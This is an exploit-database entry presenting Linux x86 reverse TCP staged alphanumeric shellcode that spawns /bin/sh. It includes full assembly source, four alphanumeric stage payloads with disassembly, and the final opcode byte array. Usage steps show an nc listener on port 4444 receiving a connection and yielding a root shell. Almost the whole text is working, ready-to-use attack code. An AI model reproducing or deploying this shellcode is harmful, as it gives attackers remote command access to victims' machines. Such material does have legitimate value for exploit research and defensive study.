########### Reverse TCP Staged Alphanumeric Shellcode Linux x86 Execve /bin/sh ######## ########### Author: Snir Levi, Applitects ############# ## 103 Bytes ## date: 9.2.17 Automatic python shellcode handler (with stage preset send) will be ready soon: https://github.com/snir-levi/Reverse_TCP_Alphanumeric_Staged_Shellcode_Execve-bin-bash/ IP - 127.0.0.1 PORT - 4444 #### Stage Alphanumeric shellcode: ##### Stage 1: dup2 stdin syscall: WXW[j?XV[WYPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXP W push edi X pop eax W push edi [ pop ebx j? push 0x3f X pop eax V push esi [ pop ebx W push edi Y pop ecx P push eax X pop eax P push eax X pop EAX Stage 2: dup2 stdout syscall: WXW[j?XV[WYAPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPX W push edi X pop eax W push edi [ pop ebx j? push 0x3f X pop eax V push esi [ pop ebx W push edi Y pop ecx A inc ecx (ecx =1) P push eax X pop eax P push eax Stage 3: dup2 stderr syscall: WXW[j?XV[WYAPXAPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXP W push edi X pop eax W push edi [ pop ebx j? push 0x3f X pop eax V push esi [ pop ebx W push edi Y pop ecx A*2 inc ecx (ecx = 2) P push eax X pop eax A inc ecx Stage 3: execve /bin/sh: j0XHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHWYWZWh//shh/binT[ j0 push 0x30 X pop eax H*32 dec eax //eax = 0x0b W push edi Y pop ecx W push edi Z pop edx W push edi // null terminator h//sh push 0x68732f2f //sh h/bin push 0x6e69622f /bin T push esp [ pop ebx Usage: Victim Executes the shellcode, and opens tcp connection Stage: After Connection is established, send the 4 stages ***separately*** nc -lvp 4444 connect to [127.0.0.1] from localhost [127.0.0.1] (port) WXW[j?XV[WYPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXP WXW[j?XV[WYAPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPX WXW[j?XV[WYAPXAPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXP j0XHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHWYWZWh//shh/binT[ whoami root id uid=0(root) gid=0(root) groups=0(root) global _start _start: ; sock = socket(AF_INET, SOCK_STREAM, 0) ; AF_INET = 2 ; SOCK_STREAM = 1 ; syscall number 102 - socketcall ; socket = 0x01 xor eax,eax xor esi,esi push eax pop edi push eax mov al, 0x66 push byte 0x1 pop ebx push byte ebx push byte 0x2 mov ecx, esp int 0x80 xchg esi, eax; save sock result ; server.sin_family = AF_INET ; server.sin_port = htons(PORT) ; server.sin_addr.s_addr = inet_addr("127.0.0.1") push byte 0x1 pop edx shl edx, 24 mov dl, 0x7f ;edx = 127.0.0.1 (hex) push edx push word 0x5c11 ;port 4444 push word 0x02 ; connect(sock, (struct sockaddr *)&server, sockaddr_len) mov al, 0x66 mov bl, 0x3 mov ecx, esp push byte 0x10 push ecx push esi mov ecx ,esp int 0x80 stageAddress: ;saves stage address to edx mov edx, [esp] sub bl,3 jnz stage call near stageAddress ;recv(int sockfd, void *buf, size_t len, int flags); stage: mov al, 0x66 mov bl, 10 push edi push word 100 ; buffer size push edi push esi ; socketfd mov [esp+4],esp ; sets esp as recv buffer mov ecx,esp int 0x80 mov al, 0xcd mov ah, 0x80 ; eax = int 0x80 mov bl, 0xFF mov bh, 0xE2 ; ebx = jmp edx mov [esp+57],al mov [esp+58],ah mov [esp+59], ebx ;the end of the buffer contains the syscall command int 0x80 and jmp back to stage jmp esp unsigned char[] = "\x31\xc0\x31\xf6\x50\x5f\x50\xb0\x66\x6a\x01\x5b\x53\x6a \x02\x89\xe1\xcd\x80\x96\x6a\x01\x5a\xc1\xe2\x18\xb2\x7f\x52 \x66\x68\x11\x5c\x66\x6a\x02\xb0\x66\xb3\x03\x89\xe1\x6a\x10\x51\x56\x89\xe1 \xcd\x80\x8b\x14\x24\x80\xeb\x03\x75\x05\xe8\xf3\xff\xff\xff \xb0\x66\xb3\x0a\x57\x66\x6a\x64\x57\x56\x89\x64\x24\x04\x89\xe1\xcd\x80\xb0 \xcd\xb4\x80\xb3\xff\xb7\xe2\x88\x44\x24\x39\x88\x64\x24\x3a \x89\x5c\x24\x3b\xff\xe4" # Iranian Exploit DataBase = http://IeDb.Ir [2017-02-11]